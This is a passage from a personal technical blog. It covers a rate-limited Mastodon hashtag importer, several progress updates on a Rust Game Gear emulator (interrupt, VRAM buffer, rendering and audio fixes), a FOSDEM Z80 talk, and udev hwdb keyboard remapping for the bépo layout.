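    /// Blocking helper: sleeps until the next request conforms.
    fn wait(&mut self) {
        while let Err(delay) = self.check(Instant::now()) {
            std::thread::sleep(delay);
        }
    }
}
```

With an interval of 60 seconds and a burst of 1, this gives the "1 req/min" behaviour; the state is a single timestamp, which is what makes GCRA attractive compared to counting requests in a window.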

In the end, it was an interesting learning experience, and the code is much more readable with limits than with sleeps. So I want to thank the Treehouse Staff for providing valuable feedback upfront (and letting me run hashtag-importer on the instance).

Real-world use: Kernel Recipes

This tool was started just before Kernel Recipes, so the conference was used as an opportunity to import more posts on the #kr2023 hashtag. It found a few posts that weren't visible from my instance, even though I'm already well connected to many attendees. I wrote the Kernel Recipes live blog, so I didn't have much time to watch social networks, but it did prove somewhat useful !

FAQ

Does it support other fediverse software than Mastodon ?

Most probably not, it wasn't tested with anything else, and developed against the documented REST API of Mastodon. It does not work with Firefish for example.

Can I run this without asking my admin first ?

No, even with the care taken to lighten the load, you should always ask your admin before adding this type of automation.

Why do you hate async in Rust ?

I do not, I just did not take the time to learn enough, otherwise you wouldn't be reading this article. I still hope to convert this app to using async/await some time in the future.

February to April Gears emulator update

2023-05-02T00:00:00+02:00

Previously, I had a bug in my gears emulator, which I then fixed. But Sonic 2 still wasn't working, so let's see what went wrong there.

Missing interrupt behaviour

The Sonic 2 ROM wasn't starting at all, leaving an uninteresting black screen, which led me to suspect some kind of infinite loop. I said in the previous posts that I thought this loop could have been related to timings or interrupts.

So I looked at how the game behaved in Emulicious, another (closed-source) emulator with great debugging capability. And I noticed something weird on my side of the emulation: after a HALT instruction (that shuts down the CPU similarly to running an infinite number of NOPs), the VDP interrupt would wake up the CPU, it would be handled and return. But when returning it jumped straight into the previous HALT instruction (!), meaning it looped and never moved forward. I fixed this by implementing the missing PC increment, and it moved the startup of Sonic 2 forward.
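The fix can be illustrated with a reduced model of the CPU. This is a sketch, not the code from gears: the `Cpu` struct is invented, and it assumes the emulator keeps PC pointing at the HALT opcode while halted and that interrupts are in mode 1 (handler at 0x0038).

```rust
/// Just enough CPU state to show the HALT/interrupt interaction.
struct Cpu {
    pc: u16,
    sp: u16,
    halted: bool,
    interrupts_enabled: bool,
    memory: Vec<u8>, // 64 KiB address space
}

impl Cpu {
    /// Pushes a 16-bit value on the stack, low byte at the lower address.
    fn push16(&mut self, value: u16) {
        self.sp = self.sp.wrapping_sub(2);
        let sp = self.sp as usize;
        self.memory[sp] = value as u8;
        self.memory[(sp + 1) & 0xFFFF] = (value >> 8) as u8;
    }

    /// Services a maskable interrupt in mode 1 (jump to 0x0038).
    fn interrupt(&mut self) {
        if !self.interrupts_enabled {
            return;
        }
        if self.halted {
            // While halted, PC still points at the HALT opcode: step past it
            // so that returning from the handler resumes after the HALT.
            self.halted = false;
            self.pc = self.pc.wrapping_add(1);
        }
        self.interrupts_enabled = false;
        let return_address = self.pc;
        self.push16(return_address);
        self.pc = 0x0038;
    }
}
```

Without the increment, the return address pushed on the stack is the HALT itself, which is exactly the loop described above.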

Later, I went looking at another game that didn't finish starting: Global Gladiators. I figured it might be something related with an infinite loop somewhere + interrupts. I went to the frame that froze...

... and I noticed something similar: a loop reading from the VDP V Counter (or line counter), waiting for it to be 0xC0. But it never happened ! Because at 0xC0, the VDP raised an interrupt and by the time the interrupt was handled, the VDP already had processed a few other lines. So the code looped, waiting for an event that never happened. Emulicious seemed to send the interrupt at 0xC1, contrary to what the official Game Gear manual said would happen; but Charles MacDonald's VDP documentation from 2002 said it should happen at 0xC1. So I simply fixed it by using this same value. But something tells me there might be other timing-related bugs hiding here. At least I can now play one of the greatest games of the platform 😉

How about this ?

Did a brand pay for this ?

In the end, this untested interrupt code is the source of multiple bugs... I might need to find a way to write simple tests for these.

Palettes

This one is a quite simple and well-documented VDP feature for background patterns: there's a bit to have them use the second color palette (usually for sprites). It allows using 16 more colors for the background: background can use 32 colors, while sprites can only use the second half (16) of those colors at a given time.

Bad rendering: which character is selected ?

Palette bit is used to implement character selection

The color palette select bit was already decoded, but not used for rendering, so the fix was straightforward.
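As a sketch of what "using the bit for rendering" means: the layout below (pattern index in bits 0 to 8, palette select in bit 11 of a 16-bit tilemap entry) follows the commonly documented VDP name table format, and the names are invented, not taken from gears.

```rust
/// Decoded background tilemap entry (only the fields needed here).
struct TileEntry {
    pattern: u16,
    palette: u8,
}

/// Assumed layout: bits 0-8 pattern index, bit 11 palette select.
fn decode_entry(entry: u16) -> TileEntry {
    TileEntry {
        pattern: entry & 0x1FF,
        palette: ((entry >> 11) & 1) as u8,
    }
}

/// Index into the 32-entry color RAM for a pixel value in 0..=15.
fn cram_index(palette: u8, pixel: u8) -> usize {
    usize::from(palette) * 16 + usize::from(pixel & 0x0F)
}
```

The bug amounted to always calling the equivalent of `cram_index(0, pixel)` for the background, whatever the entry said.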

Bad rendering with palette 0

Sonic and Tails use palette 1

Making sounds

After fixing enough VDP bugs that many games are now playable, I started looking into making sound. I used the Rust crate cpal, which seemed like the most well-maintained and portable abstraction for playing audio. After a PoC to play a simple 440 Hz sinusoid, I slowly wired things up. The programming model of cpal is to provide a callback that will be polled by an audio thread, so it forced my design to do more Send+Sync data structures, while initially everything in gears was single threaded, with the use of Rc for some simple high-level things like dynamic device registration. It forced me to use Arc and Mutex to ensure the PSG data structures would be shareable across threads.

I was inspired by the design of the VGM 'audio' files, which are just basically command dumps from the PSG writes. Audio rendering is done as late as possible to ensure being as independent as possible from the sample format. The queue of commands updates the PSG internal state, and it generates audio when cycles go forward.
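The shape of such a shared command queue can be sketched with the standard library alone. The types below are hypothetical and much simpler than the real ones in gears; there is no cpal code here, the "audio callback" is just whoever calls `drain_until`.

```rust
use std::collections::VecDeque;
use std::sync::{Arc, Mutex};

/// A PSG register write, stamped with the CPU cycle at which it happened.
#[derive(Debug, Clone, Copy, PartialEq)]
struct PsgWrite {
    cycle: u64,
    value: u8,
}

/// Queue shared between the emulation thread (producer) and the audio
/// callback (consumer). Cloning shares the same underlying queue.
#[derive(Clone, Default)]
struct PsgQueue(Arc<Mutex<VecDeque<PsgWrite>>>);

impl PsgQueue {
    fn push(&self, write: PsgWrite) {
        self.0.lock().unwrap().push_back(write);
    }

    /// Removes and returns all writes that happened up to `cycle`, in order.
    fn drain_until(&self, cycle: u64) -> Vec<PsgWrite> {
        let mut queue = self.0.lock().unwrap();
        let mut due = Vec::new();
        while queue.front().map_or(false, |w| w.cycle <= cycle) {
            due.push(queue.pop_front().unwrap());
        }
        due
    }
}
```

Keeping the cycle stamp with each write is what lets the consumer apply commands at the right point of the generated audio instead of all at once.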

Just like with the VDP, the CPU cycles are the reference, so instruction cycles need to be correctly counted or emulation can be visibly changed.

Audio is played in real time, so there is a high accuracy component to ensure what comes out sounds 'good'; and in gears, synchronization is far from done — not because of instructions: cycle accuracy is good enough to pass the fuse test suite. But because the emulator currently relies on VSYNC to do 60 frames per second: it's very convenient that all my screens are also at 60Hz, like the Game Gear's LCD!

But since frames during which the VDP is BLANK (screen "off") are not displayed, the emulation goes too fast during blank frames ! It means that PSG commands will accumulate and need to be "flushed" later on to keep the queue from growing indefinitely; this leads to weird fast music effects, then going back to normal speed, like during the beginning of the Green Level in Sonic 1:


As you can hear, in addition to proper synchronization, there are other things missing, like noise generation. Maybe for the next update ?

January Gears emulator update

2023-01-28T00:00:00+01:00

Previously, I had a bug on my emulator with the way the map is rendered.

With the bug

How it should look

After I wrote the previous article, I posted it on the SMS power discord, asking for ideas on this corruption bug. Many great people chimed in.

A question I had was if I could dump the tileset to look at the video ram of the VDP to find out if anything might be corrupted.

Interlude: Tilesets

A tileset is the list of tiles (sometimes called "patterns" or "characters") in memory that can be used for background or sprites.

On a typical Game Gear game, those live in the ROM, then are copied in Video RAM (VRAM) once the ROM is mapped in the address space. They can only be displayed by the VDP from the VRAM.

The VRAM can hold 512 tiles, and each tile is 8x8 pixels. So I initially rendered the memory region in a 256x128 tileset (32x16 tiles).

But the map looked weird, and someone rightfully told me it would look much better if rendered in the other dimension (16x32 tiles):

The map is entirely visible! It's as if the artists worked exactly like this. We can clearly see the corruption bug in the first two tile lines.
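The two layouts only differ by how many tiles go on each row of the sheet. Here is a minimal sketch of the placement and of the decoding of one pixel; `tile_origin` and `tile_pixel` are hypothetical helper names, and the sketch assumes the usual planar storage of 32 bytes per tile (8 rows of 4 bytes, one byte per bitplane, leftmost pixel in the most significant bit).

```rust
/// Size of one tile in VRAM: 8 rows of 4 bytes (one byte per bitplane).
pub const TILE_BYTES: usize = 32;
/// Width and height of a tile, in pixels.
pub const TILE_SIZE: usize = 8;

/// Top-left pixel of tile `index` in a sheet that is `tiles_per_row` tiles wide.
pub fn tile_origin(index: usize, tiles_per_row: usize) -> (usize, usize) {
    (
        (index % tiles_per_row) * TILE_SIZE,
        (index / tiles_per_row) * TILE_SIZE,
    )
}

/// 4-bit color code of pixel (x, y) of tile `index`, read from planar VRAM data.
pub fn tile_pixel(vram: &[u8], index: usize, x: usize, y: usize) -> u8 {
    let row = &vram[index * TILE_BYTES + y * 4..][..4];
    let bit = 7 - x; // the leftmost pixel is the most significant bit
    row.iter()
        .enumerate()
        .fold(0, |code, (plane, byte)| code | (((*byte >> bit) & 1) << plane))
}
```

With `tiles_per_row` set to 32 the sheet is 256x128 pixels; with 16 it becomes 128x256, and tile 17 moves from the first row to the second one.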

Something feels off though: it seems like the bottom half (usually used for sprites) is using the wrong palette. In the VDP, background can use both palette 0 and 1 (0 by default), but sprites always use palette 1. Let's render the bottom half with palette 1 instead:

Transparency is also respected, which you'll be able to see by dragging the image on a desktop browser (grey background added for readability).

But something is still missing. Like those sprites are split or something. What if we tried to honor the SIZE bit for the bottom half in order to see double-size sprites ?

Much better ! We can clearly see Dr Eggman, numbers, as well as the level lines. Now that I had a nice-looking tileset, maybe I could try to find the source of the corruption ?

VRAM read/write CPU buffer

An SMS Power member suggested that it might be related to the incorrect reads from the VRAM. What did they mean ?

Here is how I imagined a VDP read and write to VRAM happened:

CPU would use an OUT instruction to the VDP to select the I/O address, and then would do an IN for the VRAM read; VDP would respond by fetching the data and giving it to the CPU.

For the write, after an OUT instruction to set the I/O address, another OUT would write the data directly to VRAM.

But of course that's not how any of this works. Because of physics. There's a real latency to do I/O to and from VRAM. And to work around that, the VDP has a 1-byte "cache" buffer used for VRAM transactions.

A more accurate version would look like this:

There are actually two types of OUT addresses to set an I/O address: one for setting a read address, and another for a write address. And they have different behaviour, which is not at all apparent in the official Sega Game Gear Hardware reference manual.

Setting a read address will immediately trigger a read from VRAM. This read will be stored in the 1-byte buffer in the VDP. The subsequent IN instruction will read data directly from this buffer, instead of from VRAM. This way the latency stays manageable. And just after each read from VRAM, the VDP will auto-increment the VRAM address, and fetch the next byte.

For writes, the story is similar, except setting the write address has no other side effect. Doing a write will first write data in the 1-byte buffer, write the buffer to VRAM, and then auto-increment the address.

Why the auto-increment ? Because it allows this kind of pattern:

Sequential access. The address only needs to be set once, and then the following I/O will automatically be at the next address. For reads, it also means that the next byte should already be pre-fetched and readily available in the buffer. It's a particularity of Reads: they only happen from the 1-byte cache buffer, and trigger the next byte fetch.

You probably see where I'm going with that. What if you do a read without any previous read or read address setup ?

You have an edge case ! You'll read whatever was in the buffer in the VDP, and this might not be what you expect.

Here is another edge case to show a more likely sequence of operations:

Setting a read address will do the fetch in the 1-byte buffer, and also auto-increment the VRAM address in the VDP; so if the next instruction is a write instead, the write will happen at address + 1 ! And if you do a subsequent read, you'll read the value of what you previously wrote, which is not really useful.
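The behaviour described in this section fits in a few lines. The following is a minimal sketch, not the implementation from gears: the `Vdp` type and its method names are hypothetical, the two kinds of control-port writes are modelled as two separate methods, and VRAM is assumed to be 16 KiB with a wrapping 14-bit address.

```rust
/// Simplified VDP data path (hypothetical names), with 16 KiB of VRAM.
pub struct Vdp {
    vram: Vec<u8>,
    addr: u16,
    buffer: u8,
}

/// VRAM addresses are assumed to be 14 bits wide and to wrap around.
const ADDR_MASK: u16 = 0x3fff;

impl Vdp {
    pub fn new() -> Self {
        Vdp { vram: vec![0; 0x4000], addr: 0, buffer: 0 }
    }

    fn increment(&mut self) {
        self.addr = (self.addr + 1) & ADDR_MASK;
    }

    /// Read address setup: prefetch into the buffer, then auto-increment.
    pub fn set_read_address(&mut self, addr: u16) {
        self.addr = addr & ADDR_MASK;
        self.buffer = self.vram[self.addr as usize];
        self.increment();
    }

    /// Write address setup: no side effect besides latching the address.
    pub fn set_write_address(&mut self, addr: u16) {
        self.addr = addr & ADDR_MASK;
    }

    /// Data port read (IN): return the buffered byte, then prefetch the next one.
    pub fn read_data(&mut self) -> u8 {
        let value = self.buffer;
        self.buffer = self.vram[self.addr as usize];
        self.increment();
        value
    }

    /// Data port write (OUT): go through the buffer, store to VRAM, auto-increment.
    pub fn write_data(&mut self, value: u8) {
        self.buffer = value;
        self.vram[self.addr as usize] = value;
        self.increment();
    }
}
```

With this model, calling `set_read_address(0x100)` followed by `write_data(v)` stores `v` at 0x101, and the next `read_data()` returns `v` from the buffer: the same edge case as described above.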

The way the hardware works is in fact more complex than what I expected. And this was widely known at the time, the developers used this behaviour in actual ROMs, for example to skip a byte after a read and write at the following byte.

Once I fixed that I noticed that Sonic Triple Trouble's demo behaviour changed, which broke some tests. I can no longer automatically reproduce the screenshots from the previous article, because they were generated with a buggy VDP read/write implementation.

And this bug ?

Unfortunately, adding the 1-byte buffer did not fix the map corruption bug.

So I had to go deeper, and look at the code being executed. In its current form, gears does not have a debugger, but there are a few features: pressing space can stop/start the execution, and I also added single-frame stepping with another key. There's also a parameter in the code to print every executed instruction. Coupling that with tracking down VRAM accesses (read and write), I noticed something weird, a dozen or so instructions before the corrupt data was written: two consecutive read instructions, that went from address 1023 to 0, with no address setup in the middle. It's as if the auto-increment wasn't working !

Once this issue was noticed, finding the buggy code and fixing it was quite simple. I had put a wrong constant for VRAM address auto-increment, but only for reads; I later removed open-coded constants to prevent this type of issue.

Finally, here is the tileset, as generated without the corruption issue:

Startup tileset

I also generated the tileset for the starting animation of Sonic 1 for fun:

Bonus: region

As I was tracking down this issue, I wondered if this could be related to some other feature/device I didn't implement. I looked at the system I/O port and found that I did not implement the region bit, hardcoding World (instead of Japan). I was surprised to see my regression tests start failing when I changed the region:

Sonic splash screen on World region.

Sonic splash screen on Japan region.

The ™ disappeared ! I remember reading about this online, so this is already widely known, but it still surprised me. It also affects the Press Start screen:

Sonic Press Start screen on World region.

Sonic Press Start screen on Japan region.

What's next ?

Many games still don't work at all, starting with Sonic 2 that does not display anything, just a black screen. I might look into what happens there next. I suspect it might be something related to timings or interrupts, but who knows ?

December Gears emulator update

2023-01-04T00:00:00+01:00

I wrote here about how I'm writing an emulator. How has it progressed ?

Fixing a rendering bug with backgrounds

In November I wrote on mastodon how I was tracking down a rendering bug.

To track down this issue with weird data on screen, printf debugging was not practical: there were already too many messages, so it was very hard to find anything. So I added a border to every bg/sprite character, and encoded the pattern number in the border color. I didn't know if it would work but it looked fun:

I then slightly changed the encoding in border color (zoomed for visibility):

After that, I continued working on unrelated things. I took some time to play the game a bit more in the emulator, which finally gave me an epiphany. Once I had identified the issue, fixing it was fairly straightforward. The renderer was missing wrapping in X.

This is because you can imagine the background in the Game Gear VDP as a torus: on this torus, the viewport (the game visible area on the LCD) is a window showing the actual content, controlled by scroll offsets in X and Y.

Of course in memory, this "torus" is just a simple and straightforward memory buffer. So implementing it means wrapping around when the viewport reaches a border of the memory buffer.

Wrapping in Y was working already because rendering is done line-by-line and once the proper line is selected, it stays the same.

Wrapping in X simply wasn't done, so once a border was reached, instead of continuing rendering on the same line, we actually went to the next line ! And it also means that sometimes a line would be rendered that should never have been on screen, hence the weird looking data.
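Here is a minimal sketch of the difference, with hypothetical function names and an assumed background of 32 columns by 28 rows of tiles stored row after row; the real renderer also has to deal with scroll offsets in pixels, which are left out here.

```rust
/// Background size in tiles (assumption for this sketch: 32 columns by 28 rows).
pub const COLS: usize = 32;
pub const ROWS: usize = 28;

/// Index of the tile at (col, row) in the buffer, wrapping in both directions.
pub fn tile_index(col: usize, row: usize) -> usize {
    (row % ROWS) * COLS + (col % COLS)
}

/// The buggy variant: wrapping in Y only. Going past the last column
/// silently continues at the start of the next row of tiles.
pub fn tile_index_no_x_wrap(col: usize, row: usize) -> usize {
    (row % ROWS) * COLS + col
}
```

Asking for column 33 of row 2 should give column 1 of the same row; without the modulo on `col`, the result is column 1 of row 3, which is the "next line" effect described above.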

I'll let you compare this screenshot with the previous one:

And a final note: I was focusing entirely on the wrong thing here, only seeing the weird data, and not the other rendering bug completely shifting the background screen by 8 pixels.

In the end, the fix was relatively simple.

Implementing missing features

Off-by-one error in sprite rendering

This one was found by looking at other emulators and noticing something weird in Sonic's splash screen :

Before

After (correct render)

Can you see it ?

Here, I added a line to let you see it more easily:

Before

After (correct render)

This is due to the way the coordinates are handled for sprites. They should be offset by one pixel (compared to what I did before) ! Here is another example, zoomed in on Sonic's hand in the Press Start screen:

Before

After (correct render)

Background priority over sprites

On the Game Gear VDP, background tiles have a priority bit that allows them to be in front of sprites. This is very useful to give an impression of depth. Usually it's done so that one color from the background is not above sprites. So blending looks seamless. When rendering the background, the emulator should keep track of patterns that have the "PRIO" bit, and render them always in front of sprites (except for color code "0"). Here is a still from Sonic Triple Trouble before and after implementing background priority:

Before

After (correct render)

In this frame the trees are part of the background, and have the PRIO bit set. So they should be rendered over sprites: Sonic, but also the game status in the upper left corner !
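The rule for a single pixel can be sketched as follows. The `BgPixel` and `Shown` types and the `compose` function are hypothetical, and the sketch assumes the sprite layer has already been reduced to an optional color code per pixel (`None` where no opaque sprite pixel was drawn).

```rust
/// Which layer ends up on screen for a pixel, with its 4-bit color code.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Shown {
    Background(u8),
    Sprite(u8),
}

/// One background pixel: its color code and the PRIO bit of its tile.
#[derive(Debug, Clone, Copy)]
pub struct BgPixel {
    pub color: u8,
    pub prio: bool,
}

/// Decide what is displayed for one pixel.
pub fn compose(bg: BgPixel, sprite: Option<u8>) -> Shown {
    match sprite {
        // A PRIO background pixel hides the sprite, except for color code 0.
        Some(_) if bg.prio && bg.color != 0 => Shown::Background(bg.color),
        Some(color) => Shown::Sprite(color),
        None => Shown::Background(bg.color),
    }
}
```

The exception for color code 0 is what lets a sprite show through the "holes" of a high-priority tile, so the blending looks seamless.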

Priority between sprites

Here is Sonic 1's first frame:

Before

After (correct render)

What happens here ? Surely the first one is the correct one ? It left me just as confused as you when I looked at other emulators' rendering of this first frame. I even checked on a real Game Gear just to be sure!

The 64 sprites available on the Game Gear/SMS VDP should be rendered one by one, in the order they appear. The first sprites have priority over the later ones. This means the later ones should NOT be rendered if another sprite was rendered on a given pixel (except for transparent colors…).

So what happens on this frame ? Luckily the debug mode I developed earlier is still in the code base behind a config flag that is easy to toggle:

The game uses higher-priority blank sprites to hide the rest of Sonic ! (probably from a re-used routine). This is so that in the animation where the Sega logo appears, it looks like there's a magic line that makes everything appear. And Sonic's feet and hand would go over that line ! So they were hidden by developers by putting blank (but not transparent) sprites before Sonic.
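The "first sprite wins" rule can be sketched for one scanline like this. `SpriteLine` and `render_sprite_line` are hypothetical names, each sprite is reduced to the 8 pixels it contributes to the current line, and color code 0 is taken as transparent.

```rust
/// The 8 pixels a sprite contributes to the current scanline.
pub struct SpriteLine {
    /// Horizontal position of the sprite's leftmost pixel.
    pub x: usize,
    /// Color codes; 0 is transparent.
    pub pixels: [u8; 8],
}

/// Draw sprites in list order onto one line: a pixel already written by an
/// earlier sprite is never overwritten by a later one.
pub fn render_sprite_line(sprites: &[SpriteLine], width: usize) -> Vec<Option<u8>> {
    let mut line = vec![None; width];
    for sprite in sprites {
        for (i, &color) in sprite.pixels.iter().enumerate() {
            let x = sprite.x + i;
            if x < width && color != 0 && line[x].is_none() {
                line[x] = Some(color);
            }
        }
    }
    line
}
```

A blank but opaque sprite placed earlier in the list therefore masks whatever comes after it, which is the trick used on this frame.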

A remaining map bug

There might be plenty of remaining bugs, but here is one I found in Sonic's map screen after I implemented background priority:

Before (bad)

After (still bad, but worse)

The current level line and number of lives disappeared ! Why ? I don't know !

It seems the background priorities are incorrectly set. I have no idea why it does this.

After I saw this I thought I caused some kind of regression, so I added a test framework to generate frames and compare them with a "good" render to prevent regressions. This is how most frames in this section were generated, and why the filenames have weird names. You can check how it works in the repo and the test frames.

But it's not the only issue for this frame ! Here is how this frame should actually look, if we check how the map is rendered with another emulator:

How it looks currently

How it should look

I'm not sure I'll try very hard to fix this one. I'll probably go slowly and think about it in the background, waiting for the right epiphany.

Update: I wrote about how I fixed it.

FOSDEM talks and emulation

2022-10-16T00:00:00+02:00

In 2019 I gave a talk at FOSDEM in Brussels on the "music portal", a device I built for my children as a toy that plays music. I wrote about the first version in awk here. The talk revolved around the specifics of the Go language and how it was used to industrialize a prototype into a reliable appliance with gokrazy.

In 2021, I started working on an emulator; it's one of those things I always wanted to do, and it finally seemed simple enough, with all the experience I had, from writing small assembly bots, improving the ESIL emulator (which relied on the capstone disassembler), or working with qemu in my previous day job. I picked a platform from my childhood, and started typing during my summer break.

I did not finish the emulator, but I had a somewhat working Z80 CPU in the end, and learned a lot from it. So I decided to share what I learned, but this time not with the focus on my code (there are many such emulators, many are very good), but on this CPU architecture, the Z80, and some secrets that were discovered 30 years after its release.

I submitted a proposal to the FOSDEM Emulation devroom, and it was accepted. You can read the slides and watch my 2022 talk on Z80's last secrets here, and the discussion that ensued that is almost as long ! I had bad networking then (and mic settings), so I'm sorry about the quality of the Q&A.

My talk did not go into all the details of the Z80. For example, I had missed the gate-level reverse engineered simulators z80explorer and visualz80remix, and that should help with MEMPTR and other implementation details. I also discovered after the talk, a discord in which emulator developers are discussing even more recently-discovered secrets. But adding content to the talk would have made it even more specialized and complex. Maybe for a future talk ?

In the Q&A, I was asked if I preferred Go (since I gave a talk on a Go project 3 years earlier), or Rust (in which gears is written). I have been learning Rust for some time, and I still don't know how to answer this question. Go is definitely a simpler language, even though it has some surprising quirks. Rust is more complex but what you learn upfront reduces surprises later. Both can be very useful, and even have some overlap in functionality; I'll defer to John Arundel's Rust vs Go for more details. (fun story: I started learning Go 9 years ago, and am now writing some professionally; maybe in 5 years I'll write Rust for money ? Although I suspect it might come earlier…)

Emulator progress

This 2022 summer I started working again on the emulator, wanting to tackle at least the display side (VDP) of the Game Gear. But in the process I discovered that I had forgotten to wire the interrupt emulation properly (not needed for the test suites with no devices). I also took some time to properly implement memory banking for Sega cartridges, unused in the ZX Spectrum tests. I still found and fixed CPU bugs in my "complete" Z80 CPU emulator. There are other CPU issues which I'm not sure how to fix yet, but that shouldn't be an issue for basic emulation.

I initially dumped the VDP display state into an image to debug if I understood correctly the way the background and sprites were drawn. Here are three images of the splash screen for Sonic The Hedgehog, as I fix bugs in the implementation:

First render of the Sega splash screen with buggy code.	Render of the Sonic Press Start screen with same buggy code.
Render of the Sega splash screen after some bugfixes	Render of the Press Start screen after the same bugfixes.
Fixed Sega splash screen render with proper sprite offsets.	Fixed Press Start screen render with proper sprite offsets.

Note that this is the full VDP buffer, the LCD display area is smaller in the center; this is part of the things that aren't implemented yet !

I wired this "debug" view into a window that shows a pixel buffer, and right now it seems to work properly since my display is at 60fps. There are still many things to do but it's very encouraging that it's showing something !

Keyboard layout adventures

2021-04-24T00:00:00+02:00

I've been using a French dvorak-like key layout, called bépo, for about 13 years; sometimes, I need to hack things around to have it work everywhere, like when I wrote support for it on Android physical keyboards.

GPD Win Max Adaptation

I recently acquired a GPD Win Max, which is a descendant of netbooks crossed with a portable game console, and it quickly became my main computer (my old laptop was 10 years old, so it was indeed an upgrade).

While it's a very capable little device, it has a very condensed keyboard, which does not make it easy to use, especially when typing in bépo:

As you can see, it has been custom-designed for qwerty, and does not take into account other keyboard layouts. For example, there's no AltGr, and semicolon is hidden next to space. 60% keyboard owners would be right at home, if it were not for the lack of programmability of the layers.

In bépo, semicolon maps to N, which is a relatively common key. I decided to remap it like this, with bépo in mind:

I replaced Enter with semicolon (N in bépo), and put Enter next to Space, taking inspiration from the split keyboards which better utilize thumbs for typing. I moved Alt on the Windows key, which I almost never use, and put AltGr on the semicolon key. Finally, I depend much more on Tab than Caps Lock, so I swapped the two keys.

To do this in Linux, once upon a time, one had to modify the xmodmap key, or create a custom xkb layout. Both of these would be less useful today: one still needs to type a passphrase before the X server starts (to unlock the disks), or to type stuff in wayland apps (which don't use the X layout). Fortunately, starting with udev 175, it's now possible to rearrange physical keys directly with udev. See for example this tutorial or this one in french (english here).

So I decided to re-order the keys (scancodes) at the udev level, to make use of the bépo layout as-is. The first step is to find which input device is the keyboard. I like looking into /proc/bus/input/devices. On x86 laptops, the keyboard is usually accessible through the i8042 device:

> cat /proc/bus/input/devices
[… cut …]

I: Bus=0011 Vendor=0001 Product=0001 Version=ab83
N: Name="AT Translated Set 2 keyboard"
P: Phys=isa0060/serio0/input0
S: Sysfs=/devices/platform/i8042/serio0/input/input4
U: Uniq=
H: Handlers=sysrq kbd leds event4
B: PROP=0
B: EV=120013
B: KEY=402000000 3803078f800d001 deffffdfffefffff fffffffffffffffe
B: MSC=10
B: LED=7

[… cut …]

It says here its sysfs device is /devices/platform/i8042/serio0/input/input4. I want to know how to match this device with udev, so I run:

> sudo udevadm info /sys/devices/platform/i8042/serio0/input/input4
P: /devices/platform/i8042/serio0/input/input4
L: 0
E: DEVPATH=/devices/platform/i8042/serio0/input/input4
E: PRODUCT=11/1/1/ab83
E: NAME="AT Translated Set 2 keyboard"
E: PHYS="isa0060/serio0/input0"
E: PROP=0
E: EV=120013
E: KEY=402000000 3803078f800d001 deffffdfffefffff fffffffffffffffe
E: MSC=10
E: LED=7
E: MODALIAS=input:b0011v0001p0001eAB83-e0,1,4,11,14,k71,72,73,74,75,76,77,79,7A,7B,7C,7E,7F,80,8C,8E,8F,9B,9C,9D,9E,9F,A3,A4,A5,A6,AC,AD,B7,B8,B9,D9,E2,ram4,l0,1,2,sfw
E: SUBSYSTEM=input
E: USEC_INITIALIZED=12327754
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: ID_INPUT_KEYBOARD=1
E: ID_BUS=i8042
E: ID_SERIAL=noserial
E: ID_PATH=platform-i8042-serio-0
E: ID_PATH_TAG=platform-i8042-serio-0
E: ID_FOR_SEAT=input-platform-i8042-serio-0
E: TAGS=:seat:

The interesting line here is the MODALIAS. I'll use the input:b0011v0001p0001eAB83… line to match precisely this keyboard, and ask udev to swap its keys. In order to do this, I follow the tutorial I linked earlier and create a file in /etc/udev/hwdb.d:

> cat /etc/udev/hwdb.d/98-gpd-keyboard.hwdb
evdev:input:b0011v0001p0001eAB83*
 KEYBOARD_KEY_db=leftalt   # Alt on windows
 KEYBOARD_KEY_38=enter     # enter on Alt
 KEYBOARD_KEY_1c=semicolon # n on enter
 KEYBOARD_KEY_27=rightalt  # AltGr on n
 KEYBOARD_KEY_3a=tab       # swap caps lock and tab
 KEYBOARD_KEY_0f=capslock  # swap tab and caps lock

Then update the udev hwdb:

> sudo udevadm hwdb --update

and re-trigger rules for this device:

> sudo udevadm trigger /dev/input/event4

Note that I use the device node instead of the sysfs path for the trigger: /dev/input/event4.
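The match line of the hwdb file is the beginning of the MODALIAS, which itself repeats the bus, vendor, product and version IDs from the "I:" line of /proc/bus/input/devices. As an illustration only, here is a small sketch that rebuilds it; `hwdb_match` is a hypothetical helper, and it assumes the four IDs appear in the modalias as uppercase hexadecimal, as in the output above.

```rust
/// Build the hwdb match line for an input device from the "I:" line of
/// /proc/bus/input/devices. Returns None if the line is not an "I:" line
/// or if one of the four fields is missing.
pub fn hwdb_match(info_line: &str) -> Option<String> {
    let fields = info_line.strip_prefix("I:")?;
    let (mut bus, mut vendor, mut product, mut version) = (None, None, None, None);
    for field in fields.split_whitespace() {
        match field.split_once('=') {
            Some(("Bus", v)) => bus = Some(v),
            Some(("Vendor", v)) => vendor = Some(v),
            Some(("Product", v)) => product = Some(v),
            Some(("Version", v)) => version = Some(v),
            _ => {}
        }
    }
    // The modalias shows the IDs in uppercase hex (ab83 becomes AB83).
    Some(format!(
        "evdev:input:b{}v{}p{}e{}*",
        bus?.to_uppercase(),
        vendor?.to_uppercase(),
        product?.to_uppercase(),
        version?.to_uppercase()
    ))
}
```

For the keyboard above, the line "I: Bus=0011 Vendor=0001 Product=0001 Version=ab83" gives back the match used in the hwdb file; the trailing `*` covers the rest of the modalias.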

Yubikey OTP with bépo

A Yubikey used in OTP mode will send keys that have been selected to be a common "subset" between common western layouts: qwerty, azerty, qwertz, etc. Of course, no key is at the same place in bépo, so this doesn't work.

Using the exact same methodology as before, it's possible to use a Yubikey (in OTP mode) without changing the keymap to qwerty/azerty before use. Here is the file I now have on multiple machines:

> cat /etc/udev/hwdb.d/99-yubi-bepo.hwdb
# Scancodes: https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2
# Yubikey character list: https://blog.inf.ed.ac.uk/project313/2016/01/29/modified-hexadecimal-encoding-a-k-a-modhex/
# keycodes: /usr/include/linux/input-event-codes.h
# tutorial: EN https://yulistic.gitlab.io/2017/12/linux-keymapping-with-udev-hwdb/ FR https://www.vinc17.net/unix/xkb.fr.html
evdev:input:b0003v1050p0407e0110*
 KEYBOARD_KEY_70005=q          # b
 KEYBOARD_KEY_70006=h          # c
 KEYBOARD_KEY_70007=i          # d
 KEYBOARD_KEY_70008=f          # e
 KEYBOARD_KEY_70009=slash      # f
 KEYBOARD_KEY_7000a=comma      # g
 KEYBOARD_KEY_7000b=dot        # h
 KEYBOARD_KEY_7000c=d          # i
 KEYBOARD_KEY_7000d=p          # j
 KEYBOARD_KEY_7000e=b          # k
 KEYBOARD_KEY_7000f=o          # l
 KEYBOARD_KEY_70011=semicolon  # n
 KEYBOARD_KEY_70015=l          # r
 KEYBOARD_KEY_70017=j          # t
